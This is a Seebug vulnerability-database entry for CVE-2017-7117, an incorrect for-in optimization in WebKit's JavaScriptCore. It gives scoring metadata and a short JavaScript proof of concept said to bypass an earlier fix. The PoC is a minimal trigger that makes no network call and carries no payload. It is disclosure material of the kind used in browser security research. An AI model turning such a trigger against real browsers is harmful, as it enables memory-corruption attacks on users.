Lucene search

K
seebugRootSSV:96630
HistoryOct 10, 2017 - 12:00 a.m.

WebKit: JSC: Incorrect for-in optimization #2(CVE-2017-7117)

2017-10-1000:00:00
Root
www.seebug.org
23

0.088 Low

EPSS

Percentile

93.9%

No description provided by source.


                                                The following PoC bypasses the fix for the https://www.seebug.org/vuldb/ssvid-96629.

PoC:
function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();